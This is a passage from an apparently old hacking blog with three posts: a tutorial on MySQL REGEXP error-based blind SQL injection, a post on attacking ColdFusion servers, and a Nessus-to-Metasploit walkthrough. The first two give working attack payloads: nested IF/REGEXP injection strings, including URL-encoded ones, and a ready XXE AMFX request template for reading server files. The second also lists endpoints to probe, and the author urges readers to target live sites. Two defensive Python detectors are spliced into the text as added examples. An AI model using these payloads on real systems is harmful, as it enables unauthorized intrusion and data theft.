If you get a regexp error message, like the image above, in your response then you should be able to use this method; if not then you will need to resort to an alternative approach using some other means (union, error based, boolean, time, get creative idk). Assuming the coast is clear let's continue the injection to show how it works...<br /><br />Now, similar to boolean injection it is very wise to check the length of the result data before trying to extract it. You can play with the return value so the error is thrown either when the value exists or when it does not, it is up to you; in this example the error is thrown on false statements only. If the value is NULL or empty this will throw an error, otherwise it will return true and the normal page results are displayed. <br />
<br /><b>EXAMPLE: </b>http://192.168.2.43/sqli-labs/Less-5/index.php?id=1' and 1=(SELECT 1 REGEXP IF((select length( (SELECT version()) )>0),1,''))-- - <br />
<b>ERROR MSG: </b>?<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/om4e2k2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="http://i.imgur.com/om4e2k2.png" width="400" /></a></div>
<br />
<br />
We increment our length comparison value and see the error appear:<br /><b>EXAMPLE: </b>http://192.168.2.43/sqli-labs/Less-5/index.php?id=1' and 1=(SELECT 1 REGEXP IF((select length( (SELECT version()) )>10),1,''))-- - <br />
<b>ERROR MSG: </b>Got error 'empty (sub)expression' from regexp<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/yLMAGlo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="http://i.imgur.com/yLMAGlo.png" width="400" /></a></div>
<br />
We can change our query to ask if it actually is the length by changing our comparison operator to equals. We know it's between 0 and 10 in this case, so we simply walk from 0 to 10 and when we do not see an error it will let us know this is the correct value for our result length (the version in this case).<br />
<br />
<b>EXAMPLE:</b> http://192.168.2.43/sqli-labs/Less-5/index.php?id=1' and 1=(SELECT 1 REGEXP IF( ( select length( ( SELECT version() ) )=5 ) ,1,'' ) )-- -<br />
<b>ERROR MSG: </b>Got error 'empty (sub)expression' from regexp<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/azasx7y.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="http://i.imgur.com/azasx7y.png" width="400" /></a></div>
<br />
<b>EXAMPLE:</b> http://192.168.2.43/sqli-labs/Less-5/index.php?id=1' and 1=(SELECT 1 REGEXP IF( ( select length( ( SELECT version() ) )=6 ) ,1,'' ) )-- -<br />
<b>ERROR MSG: </b>w00t => No Error<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/h4QmQ8M.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="http://i.imgur.com/h4QmQ8M.png" width="400" /></a></div>
<br />
<br />
If we keep going we will see the errors come back again....<br />
<b>EXAMPLE: </b>http://192.168.2.43/sqli-labs/Less-5/index.php?id=1' and 1=(SELECT 1 REGEXP IF( ( select length( ( SELECT version() ) )=7 ) ,1,'' ) )-- -<br />
<b>ERROR MSG: </b>Got error 'empty (sub)expression' from regexp<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/H9ax5cV.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="http://i.imgur.com/H9ax5cV.png" width="400" /></a></div>
<br />
As you see above, we get no error when the length is 6, so we know the length of our version() result output is 6 characters. Knowing this we can now safely go after the actual result itself. This is where this method's true time savings come into play as well. In boolean injection we are typically restricted to sending a query to check one char value at a time, which leads to it being so time consuming. Here we will leverage all 10 possible error messages to guess our char value in ranges, and then once the range is known we will use 10 guesses at a time until we find it. Given the standard 256 ascii charset we can typically guess any char value in 4 requests or less, compared to 10x that in the traditional boolean method. Knowing the length is 6, let's now find the full value for the first char so you see how it works to extract...<br />
<br />
<b>EXAMPLE: </b><br />http://192.168.2.43/sqli-labs/Less-5/index.php?id=1' aNd 1=(SELECT 1 REGEXP <br />IF(ASCII(SUBSTRING((SELECT version()),1,1))<31,'', <br />IF(ASCII(SUBSTRING((SELECT version()),1,1))<52,'(', <br />IF(ASCII(SUBSTRING((SELECT version()),1,1))<73,'[', <br />IF(ASCII(SUBSTRING((SELECT version()),1,1))<94,'\\\\',<br />IF(ASCII(SUBSTRING((SELECT version()),1,1))<115,'*', <br />IF(ASCII(SUBSTRING((SELECT version()),1,1))<136,'a{1,1,1}', <br />IF(ASCII(SUBSTRING((SELECT version()),1,1))<157,'[a-9]', <br />IF(ASCII(SUBSTRING((SELECT version()),1,1))<178,'a{1', <br />IF(ASCII(SUBSTRING((SELECT version()),1,1))<199,'[[.ab.]]', <br />IF(ASCII(SUBSTRING((SELECT version()),1,1))<230,'[[:ab:]]',1)))))))))))-- - <br /><br /><b>URLENCODED:</b><br />http://192.168.2.43/sqli-labs/Less-5/index.php?id=1'+aNd+1%3D%28SELECT+1+REGEXP+IF%28ASCII%28SUBSTRING%28%28SELECT+version%28%29%29%2C1%2C1%29%29%3C31%2C%27%27%2C+IF%28ASCII%28SUBSTRING%28%28SELECT+version%28%29%29%2C1%2C1%29%29%3C52%2C%27%28%27%2C+IF%28ASCII%28SUBSTRING%28%28SELECT+version%28%29%29%2C1%2C1%29%29%3C73%2C%27%5B%27%2C+IF%28ASCII%28SUBSTRING%28%28SELECT+version%28%29%29%2C1%2C1%29%29%3C94%2C%27%5C%5C%5C%5C%27%2CIF%28ASCII%28SUBSTRING%28%28SELECT+version%28%29%29%2C1%2C1%29%29%3C115%2C%27%2A%27%2C+IF%28ASCII%28SUBSTRING%28%28SELECT+version%28%29%29%2C1%2C1%29%29%3C136%2C%27a%7B1%2C1%2C1%7D%27%2C+IF%28ASCII%28SUBSTRING%28%28SELECT+version%28%29%29%2C1%2C1%29%29%3C157%2C%27%5Ba-9%5D%27%2C+IF%28ASCII%28SUBSTRING%28%28SELECT+version%28%29%29%2C1%2C1%29%29%3C178%2C%27a%7B1%27%2C+IF%28ASCII%28SUBSTRING%28%28SELECT+version%28%29%29%2C1%2C1%29%29%3C199%2C%27%5B%5B.ab.%5D%5D%27%2C+IF%28ASCII%28SUBSTRING%28%28SELECT+version%28%29%29%2C1%2C1%29%29%3C230%2C%27%5B%5B%3Aab%3A%5D%5D%27%2C1%29%29%29%29%29%29%29%29%29%29%29--+-<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/xl3k5JT.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="223" src="http://i.imgur.com/xl3k5JT.png" width="400" /></a></div>
<br />
As you can see in the image above, the above query raises the "Got error 'brackets ([ ]) not balanced' from regexp" error message, aligning with our third IF statement. The first false statement triggered is the winner to the error message throwing party so we use this to determine our ranges. This means that the ascii char value for the first character of our version() result value is in the ascii range of 52-72. Ok, so now we have only 20 possibilities to enumerate in this case. In traditional boolean this may take 10-20 requests, but we only need 2! Depending on where you land or how you break up the ranges in your automated code some may be covered in 2 requests while others need 4 to cover the full target range. Here we go again with examples...<br />
<b><br /></b>
<b>EXAMPLE: </b>http://192.168.2.43/sqli-labs/Less-5/index.php?id=1' aNd 1=(SELECT 1 REGEXP <br />IF(ASCII(SUBSTRING((SELECT version()),1,1))=51,'', <br />IF(ASCII(SUBSTRING((SELECT version()),1,1))=52,'(', <br />IF(ASCII(SUBSTRING((SELECT version()),1,1))=53,'[', <br />IF(ASCII(SUBSTRING((SELECT version()),1,1))=54,'\\\\',<br />IF(ASCII(SUBSTRING((SELECT version()),1,1))=55,'*', <br />IF(ASCII(SUBSTRING((SELECT version()),1,1))=56,'a{1,1,1}', <br />IF(ASCII(SUBSTRING((SELECT version()),1,1))=57,'[a-9]', <br />IF(ASCII(SUBSTRING((SELECT version()),1,1))=58,'a{1', <br />IF(ASCII(SUBSTRING((SELECT version()),1,1))=59,'[[.ab.]]', <br />IF(ASCII(SUBSTRING((SELECT version()),1,1))=60,'[[:ab:]]',1)))))))))))-- - <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/83WmGjb.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="223" src="http://i.imgur.com/83WmGjb.png" width="400" /></a></div>
<br />
<br />Now in this case we get the error thrown on the first request indicating our target char value (would be 3 minimum on a good day using boolean)! In this case we receive the same error message from Regexp which indicates our ascii char value is 53 or after conversion '5'. We know MySQL >= 5 now. We can simply increment the character position within our substring() and get the rest of the values for the full version string. Had we not received an error on our first request we would have simply incremented our comparison values by 10 to scan the next possible ascii range, 61-70 in this particular case, until we threw an error indicating the target value. <br /><br />Now this method can be applied to pretty much any query you can think of as long as you play nicely with general SQL syntax and rules. I wrote a simple script to handle boolean blind and then I wrote a separate script to leverage this method. I then did some quick time comparisons to further highlight the time savings involved. In these simple examples I was running the database and vulnerable site on a separate machine in a VM located on the same network. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/J9qttIj.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="118" src="http://i.imgur.com/J9qttIj.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/oz1dbm2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="118" src="http://i.imgur.com/oz1dbm2.png" width="400" /></a></div>
<br />
Your times may vary with network conditions, but the time savings of Regexp vs traditional Boolean should be seen regardless of those variables!<br />
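As an added example (not code from the original post or its injector scripts), here is the defender's side of the technique described above: a small Python detector that URL-decodes access-log requests and flags the REGEXP / nested IF() / ASCII(SUBSTRING()) signature, reporting which character position is being extracted and whether the probe is in the range phase or the exact-match phase. The log lines, client addresses and shortened probes it runs over are constructed for this example.

```python
"""Flag MySQL REGEXP conditional-error probes in access-log lines.

Added example, not code from the original post. It looks for the signature
of the technique described above: a REGEXP whose pattern is chosen by nested
IF() calls comparing ASCII(SUBSTRING(...)) against thresholds, with
deliberately malformed regex literals in the branches. Log lines and client
addresses below are constructed for this example.
"""
import re
from urllib.parse import quote_plus, unquote_plus, urlparse

# Malformed regex literals used as IF() branches (as quoted in the post);
# each one forces a distinct MySQL regexp error message.
MALFORMED_BRANCHES = ("a{1,1,1}", "[a-9]", "a{1", "[[.ab.]]", "[[:ab:]]")

_REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/')
_REGEXP_IF = re.compile(r"\bREGEXP\s+IF\s*\(", re.I)
_ASCII_SUBSTR = re.compile(r"\bASCII\s*\(\s*SUBSTRING\s*\(", re.I)
_IF_CALL = re.compile(r"\bIF\s*\(", re.I)
_COMPARE = re.compile(r"\)\s*(<|=)\s*(\d{1,3})\s*,")
_POSITION = re.compile(r"SUBSTRING\s*\(\(.*?\),\s*(\d+),\s*1\)", re.I | re.S)


def analyze_request(raw_path):
    """Return a finding dict for one request path, or None if it is clean."""
    decoded = unquote_plus(urlparse(raw_path).query)
    if not (_REGEXP_IF.search(decoded) and _ASCII_SUBSTR.search(decoded)):
        return None
    compares = _COMPARE.findall(decoded)
    position = _POSITION.search(decoded)
    return {
        "technique": "mysql-regexp-conditional-error",
        # '<' comparisons narrow an ASCII range; '=' comparisons test exact values.
        "phase": "range" if any(op == "<" for op, _ in compares) else "exact",
        "thresholds": [int(value) for _, value in compares],
        "position": int(position.group(1)) if position else None,
        "if_depth": len(_IF_CALL.findall(decoded)),
        "malformed_branches": [b for b in MALFORMED_BRANCHES if f"'{b}'" in decoded],
    }


def scan_log(lines):
    """Run analyze_request over combined-format log lines; keep only findings."""
    findings = []
    for line in lines:
        match = _REQUEST.match(line)
        if not match:
            continue
        finding = analyze_request(match.group(2))
        if finding:
            finding["client"] = match.group(1)
            findings.append(finding)
    return findings


def _log_line(client, id_value):
    """Build one constructed combined-log line for a GET with ?id=<value>."""
    return (f'{client} - - [19/Mar/2015:23:10:01 -0500] "GET /sqli-labs/Less-5/'
            f'index.php?id={quote_plus(id_value)} HTTP/1.1" 200 713 "-" "curl/7.38"')


# Shortened versions of the two probe shapes discussed above (constructed).
_RANGE_PROBE = (
    "1' aNd 1=(SELECT 1 REGEXP IF(ASCII(SUBSTRING((SELECT version()),1,1))<31,'',"
    "IF(ASCII(SUBSTRING((SELECT version()),1,1))<52,'(',"
    "IF(ASCII(SUBSTRING((SELECT version()),1,1))<73,'[',"
    "IF(ASCII(SUBSTRING((SELECT version()),1,1))<136,'a{1,1,1}',1)))))-- -"
)
_EXACT_PROBE = (
    "1' aNd 1=(SELECT 1 REGEXP IF(ASCII(SUBSTRING((SELECT version()),2,1))=51,'',"
    "IF(ASCII(SUBSTRING((SELECT version()),2,1))=52,'(',"
    "IF(ASCII(SUBSTRING((SELECT version()),2,1))=53,'[',"
    "IF(ASCII(SUBSTRING((SELECT version()),2,1))=54,'a{1',1)))))-- -"
)

SAMPLE_LOG = [
    _log_line("198.51.100.7", "1"),
    _log_line("198.51.100.7", _RANGE_PROBE),
    _log_line("198.51.100.7", _EXACT_PROBE),
    _log_line("203.0.113.5", "2"),
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A burst of such requests from one client with the same position and rising thresholds is the tell; a plain boolean probe has no REGEXP and no nested IF() and is not flagged here.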
<br />
Hopefully this brings more people to be aware of this really cool method. Perhaps later I will cover some other ways it can be used in union injections and for fuzzing of tables, databases, readable files, etc. I have provided some proof of concept code so you can test this at home at your leisure to better understand and see how awesome it is. I included some easy to use proxy options as well, so if you're like me and like to see how it works then I highly encourage you to try that route; it really helps you understand things better if you're still scratching your head!<br />
<br />
MySQL Regexp Conditional Error Based Injector Source: <a href="http://pastebin.com/5qAw6KAW" target="_blank">LINK</a><br />MySQL Boolean Based Injector Source: <a href="http://pastebin.com/85mzgBdG" target="_blank">LINK</a><br />
<br />
Both need the 'colorize' & 'curb' gem to work<br /><b>COMMAND:</b> gem install colorize curb<br /><br />The above should do the trick on most systems, then the usual chmod +x is needed. Hope this is helpful to someone out there. Please don't hesitate to let me know if you have problems running either script....<br /><br />Until next time, enjoy!<br />
<br />
<br />HRhttp://www.blogger.com/profile/05957795383670307007noreply@blogger.com0tag:blogger.com,1999:blog-8671806905307905831.post-77967752516648560772013-02-26T23:34:00.000-06:002013-02-26T23:34:05.949-06:00Ruby Rox!I'm having fun learning Ruby these days, hope to have some more stuff up soon. Maybe some horrible advice on coding in Ruby, maybe some more sploits. Promise to bring some interesting fun back soon.....stay tuned!HRhttp://www.blogger.com/profile/05957795383670307007noreply@blogger.com2tag:blogger.com,1999:blog-8671806905307905831.post-59963493109555299162012-11-29T11:24:00.000-06:002012-11-29T11:24:09.126-06:00Hacking Cold Fusion Servers - Part IINow I will go over two more vulnerabilities which can be potentially leveraged to attack Cold Fusion Servers. This time we will be looking at exploiting a weak uploader as well as another LFD/LFI vulnerability but with a small twist. If you didn't catch the first part then I encourage you to read that thread before reading this one as it makes for better attack flow in general this way. Assuming you're all set, let's begin....<br /><br />Now one thing to be aware of is that Cold Fusion packed an FCKEditor in with v8 when it was first released and they didn't do proper checking on the upload types. If you give it a file as .txt but write to .cfm or .jsp it thinks this is ok! This exploit will take some coding abilities on your behalf or the ability to use Metasploit as it has a nice pre-built exploit for this one (Java Meterpreter works best for payload). You basically point and shoot with MSF and hope for the best. If the uploader is present it will try to send a multi-part upload request via POST. If successful you should be able to find a shell in the '/userfiles/file/' directory of the site. Now I have coded my own script for this and tried with Metasploit but have not successfully exploited this myself, so I'm not going to post my code just yet; I would like to confirm it first. 
You have MSF as a crutch for now, can find the module by referencing CVE-2009-2265, or just type 'use exploit/windows/http/coldfusion_fckeditor'; I will update this section when I have confirmation of working code on my part.....<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/fOVGz.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://i.imgur.com/fOVGz.png" width="316" /></a></div>
<br />
OK, so in addition to the LFD/LFI to RCE vulnerability we demonstrated in part I of this series, there is another LFD/LFI vulnerability. This time it is XML External Entity (XXE) Injection in the Data Services, which allows a wide range of XML based attacks, including Local File Disclosure, TCP scans and Denial of Service conditions, which can be achieved by recursive entity injection, attribute blow up and other types of injection. For more information about the implications associated with this vulnerability, refer to RFC 2518 (17.7 Implications of XML External Entities): http://www.ietf.org/rfc/rfc2518.txt. I will show you how we can exploit this to map out the target server and read files. Basically we send a carefully crafted XML request to the Data Service file handler and if it is vulnerable to XXE Injection it will spit back the results we ask for. Here are some common files to check:<br />
<ul>
<li>/flex2gateway/</li>
<li>/flex2gateway/http</li>
<li>/flex2gateway/httpsecure</li>
<li>/flex2gateway/cfamfpolling</li>
<li>/flex2gateway/amf</li>
<li>/flex2gateway/amfpolling</li>
<li>/messagebroker/http</li>
<li>/messagebroker/httpsecure</li>
<li>/blazeds/messagebroker/http</li>
<li>/blazeds/messagebroker/httpsecure</li>
<li>/samples/messagebroker/http</li>
<li>/samples/messagebroker/httpsecure</li>
<li>/lcds/messagebroker/http</li>
<li>/lcds/messagebroker/httpsecure</li>
<li>/lcds-samples/messagebroker/http</li>
<li>/lcds-samples/messagebroker/httpsecure</li>
</ul>
You can accomplish this with Hackbar add-on in Firefox easily enough, Burp or Netcat is just as easy. Essentially we can use the below XML Code as a framework for our file injection and enumeration, simply pass it as POST data to the vulnerable Data Service:<br />
<blockquote class="tr_bq">
"<?xml version="1.0" encoding="utf-8"?><!DOCTYPE test [ <!<b>ENTITY x3 </b>SYSTEM "<b><INSERT_PATH/FILE_HERE></b>"> ]><amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx"><body><object type="flex.messaging.messages.CommandMessage"><traits><string>body</string><string>clientId</string><string>correlationId</string><string>destination</string><string>headers</string><string>messageId</string><string>operation</string><string>timestamp</string><string>timeToLive</string></traits><object><traits /></object><null /><string /><string /><object><traits><string>DSId</string><string>DSMessagingVersion</string></traits><string>nil</string><int>1</int></object><string><b>&x3</b>;</string><int>5</int><int>0</int><int>0</int></object></body></amfx>"</blockquote>
Simply replace '<b><INSERT_PATH/FILE_HERE></b>' with the path to read and let the requests rip, like so:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/2aBHg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="322" src="http://i.imgur.com/2aBHg.png" width="400" /></a></div>
<br />
<br />
Now the cool thing here is that it works regardless of OS, since it is due to how the Data Services are handling and parsing the XML data being passed, just make sure you request the proper file type for designated system type (check server response if you have no idea)...<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/LM3tR.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="322" src="http://i.imgur.com/LM3tR.png" width="400" /></a></div>
<br />
<br />
Also in addition to reading files, you can simply pass a directory and it will spit back the directory content, making it very easy to map things out and find files worth reading. Now limited privileges may restrict some file reading but still plenty enough to cause trouble, enumerate lots of info, and possibly even read the site configuration details...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/m7GUf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="322" src="http://i.imgur.com/m7GUf.png" width="400" /></a></div>
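As an added example (not code from the original post, nor from ColdFusion or BlazeDS), here is the check a gateway or WAF sitting in front of the Data Services could run on an AMFX body before it reaches the real parser: expat walks the document with external entity fetching disabled and reports any DOCTYPE, SYSTEM entity or entity reference, none of which a legitimate AMFX message carries. The two request bodies and the placeholder file path are constructed for this example.

```python
"""Reject AMFX request bodies that declare a DTD or external entities.

Added example, not code from the original post or from ColdFusion/BlazeDS.
The message format discussed above is plain XML, so a front end can inspect
the body with expat: a DOCTYPE, and in particular an ENTITY with a SYSTEM
identifier, is grounds to reject the request. Sample bodies and the file
path inside them are constructed for this example.
"""
import xml.parsers.expat as expat


def inspect_amfx(body):
    """Parse an AMFX body with expat, never resolving external entities,
    and report DOCTYPE / entity usage plus the AMF message types seen."""
    report = {"doctype": None, "external_entities": [], "entity_refs": [],
              "message_types": []}
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        report["doctype"] = name

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        # A SYSTEM or PUBLIC identifier means the entity body is fetched from
        # a file or URL at parse time: the XXE primitive described above.
        if sysid is not None or pubid is not None:
            report["external_entities"].append((name, sysid))

    def on_external_ref(context, base, sysid, pubid):
        # Record the reference and return 1 so expat carries on WITHOUT
        # loading sysid; nothing is read from disk or the network here.
        report["entity_refs"].append(sysid)
        return 1

    def on_start(name, attrs):
        if name == "object" and "type" in attrs:
            report["message_types"].append(attrs["type"])

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = on_start
    data = body.encode("utf-8") if isinstance(body, str) else body
    parser.Parse(data, True)
    return report


def is_safe_amfx(body):
    """True only if the body carries no DTD at all (and so no entities)."""
    try:
        return inspect_amfx(body)["doctype"] is None
    except expat.ExpatError:
        return False  # malformed XML is rejected as well


def reject_if_dtd(body):
    """Gatekeeper for a front end: raise on any DTD, else return the report."""
    report = inspect_amfx(body)
    if report["doctype"] is not None:
        raise ValueError(f"AMFX body declares DOCTYPE {report['doctype']!r}; "
                         f"external entities: {report['external_entities']}")
    return report


# Constructed bodies; the SYSTEM identifier is a placeholder, not a real path.
MALICIOUS_BODY = (
    '<?xml version="1.0" encoding="utf-8"?>'
    '<!DOCTYPE test [ <!ENTITY x3 SYSTEM "file:///PLACEHOLDER/path"> ]>'
    '<amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx"><body>'
    '<object type="flex.messaging.messages.CommandMessage">'
    '<traits><string>body</string><string>operation</string></traits>'
    '<object><traits /></object><string>&x3;</string></object></body></amfx>'
)
BENIGN_BODY = (
    '<?xml version="1.0" encoding="utf-8"?>'
    '<amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx"><body>'
    '<object type="flex.messaging.messages.CommandMessage">'
    '<traits><string>body</string><string>operation</string></traits>'
    '<object><traits /></object><string>ping</string></object></body></amfx>'
)

if __name__ == "__main__":
    print(inspect_amfx(MALICIOUS_BODY))
    print("benign accepted:", is_safe_amfx(BENIGN_BODY))
```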
<br />
In addition to the named exploits in this Cold Fusion series, the same old usual suspects are still fair game here. SQL injection vulnerabilities are just as common as on PHP or ASP based sites, and 'cfincludes' can enable source disclosures. In many cases the db can be compromised and Java commands may be leveraged to further extend the potential attack vectors and escalation platform beyond that of a standard injection, so keep your eyes out and don’t be afraid to take on a new site just because it has .CFM or .JSP files instead of the oh so popular .PHP or .ASP. Hope you enjoyed this short series on hacking Cold Fusion Servers. All material for the series was available on the net in various places, all I did was wrap it up for you and try to make it a little easier to understand. If you have any questions or suggestions please post em here or let me know via PM.<br /><br />Until next time, Enjoy!<br /><br />
HRhttp://www.blogger.com/profile/05957795383670307007noreply@blogger.com1tag:blogger.com,1999:blog-8671806905307905831.post-83025320437973596032012-10-13T22:39:00.001-05:002012-10-13T22:39:05.531-05:00Nessus Part II: Integration with MetasploitPreviously I showed you how to install Nessus vulnerability scanner on your Linux system and run some basic scans. Today I would like to show a few more steps on how you can make the most of this and import your scan results directly into Metasploit, as well as how you can actually run the entire scan from within Metasploit itself. You will need to read the previous write up if you are unfamiliar with Nessus, it can be found <a href="http://kaoticcreations.blogspot.com/2012/07/how-to-install-nessus-5-on-linux.html">here</a>. Assuming you have the basics down we can now begin....<br /><br />Prerequisites:<br />
<ul>
<li>A Vulnerable Machine (Metasploitable 2.0 being used for today's demo, download available <a href="http://sourceforge.net/projects/metasploitable/">here</a>)</li>
<li>Stable up to date Metasploit installation; if you need some help getting started you can see this <a href="http://kaoticcreations.blogspot.com/2012/07/how-to-install-metasploit-on-ubuntu.html">here</a></li>
<li>Nessus v5 fully installed and running</li>
<li>Nessus scan profiles and scan types already set up as well as an already completed scan</li>
<li>a little patience</li>
</ul>
In some cases this approach is also useful to those who like to work in teams as one person can conduct a scan and then pass the results file to another team member who can then follow the coming instructions to import the results directly into their own local MSF database for continued efforts. The key for now is you have a finished report. OK, I will start where I last left off in the previous Nessus write-up which was with a completed vulnerability scan already done on the Metasploitable 2.0 virtual machine from Rapid7 team. If you still have Nessus up in the browser you should be looking at a completed scan report, similar to this:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/l84Da.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="328" src="http://i.imgur.com/l84Da.png" width="400" /></a></div>
<br />
Click on 'Download Report' in the upper right corner and choose the ".nessus" format which is easily imported and parsed by Metasploit. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/BOxqg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" src="http://i.imgur.com/BOxqg.png" width="320" /></a></div>
<br />
Since I am using Metasploitable 2.0 for my target, my report file is now saved on Desktop as "nessus_report_Metasploitable_2.0.nessus" and now we can shift our attention to Metasploit. You will need to fire up the old MSFCONSOLE to get started. Once you have Metasploit started you need to make sure your database is connected so you can actually store what you import, you can use 'db_status' command to confirm database connection status...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/urkLz.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="205" src="http://i.imgur.com/urkLz.png" width="320" /></a></div>
<br />
Now we issue the 'db_import' command and point it at the file you want to import. <br /><br /><b>COMMAND:</b> db_import /path/to/your/nessus_report.nessus<br /><br />You can use this feature for more than just Nessus by the way, it currently supports a wide variety of tools like Acunetix, Amap, Burp Suite, NeXpose, NMAP, OpenVAS and a few more (issue 'db_import' with no arguments to see a full list). You should see a message indicating your import was successful or not, hopefully it was :) You can verify the imported details by use of the 'hosts' , 'services' and 'vulns' commands which will show what is currently in the database, like so:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/Lo8oY.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="280" src="http://i.imgur.com/Lo8oY.jpg" width="400" /></a></div>
<br />
<b>SIDE-NOTE</b>: You can share scan results from other tools like NMAP scans by following the same steps, although for NMAP you might use 'services' instead of 'vulns' to see the results. You can also scan directly from within MSF by simply using the 'db_nmap' command followed by your usual NMAP syntax and results will be stored directly into the database for continued reference and use.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/6d1wS.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="224" src="http://i.imgur.com/6d1wS.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/NcSwI.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="224" src="http://i.imgur.com/NcSwI.png" width="320" /></a></div>
<br />
OK, this covers how to import things from previously run scans as well as any other supported tool which has the ability to output in a format MSF can parse (usually XML based). <br /><br />Now to see how we can actually run the Nessus scan itself directly from within the MSFCONSOLE. We can delete our imported results by simply issuing 'hosts -d <TARGET-IP>' which will remove all records for this host IP contained in the database from the previous steps. Now we can start fresh and run from the console and check the database for results when it's all said and done. First we need to load the Nessus plugin since it is not loaded by default. This is done by simply issuing the following command:<br /><br /><b>COMMAND:</b> load nessus<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/932uq.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="220" src="http://i.imgur.com/932uq.png" width="320" /></a></div>
<br />
Now you can issue the suggested 'nessus_help' command to see all the options that are available to use...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/7TfNh.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="275" src="http://i.imgur.com/7TfNh.png" width="400" /></a></div>
<br />
OK, so Nessus plugin is now loaded into MSFCONSOLE but it is not actually connected yet. We now need to actually connect MSF to the running Nessus server. We can accomplish this with the 'nessus_connect' command and a set of valid credentials for Nessus, syntax like so:<br /><br /><b>COMMAND: </b>nessus_connect userName:Password@<NessusServerIP>:8834 ok<br /><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/6IyxU.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="57" src="http://i.imgur.com/6IyxU.png" width="640" /></a></div>
<br />
<b>NOTE:</b> the 'ok' at the end to avoid issues with connecting due to certs<br /><br />Now we are connected, we need to setup our scan as we would do in the Browser based GUI configurator. We can check the available scan "policies" by issuing the 'nessus_policy_list' command. You will need to take note of the policy ID number for the scan type you want to run as we will use it in a sec to launch the actual scan...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/eUavi.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="323" src="http://i.imgur.com/eUavi.png" width="400" /></a></div>
<br />
<b>NOTE:</b> It's odd but the actual '-' prefix to each number should be used to identify the ID :p<br />
<br />
Now to launch the actual scan we put it all together:<br /><br /><b>COMMAND:</b> nessus_scan_new <policy id> <scan name> <targets><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/GyHTm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="24" src="http://i.imgur.com/GyHTm.png" width="640" /></a></div>
<br />
After you initiate the scan Metasploit doesn't try to bother you with a lot of verbose junk since they know your console space is valuable, so it runs in background and with the Nessus Server. In order to check if the scan is still running you can issue the 'nessus_scan_status' command with no arguments. You will be presented with a table of active running scans if still running otherwise it will simply state that there are no scans running, like so:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/p9n7L.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="275" src="http://i.imgur.com/p9n7L.png" width="400" /></a></div>
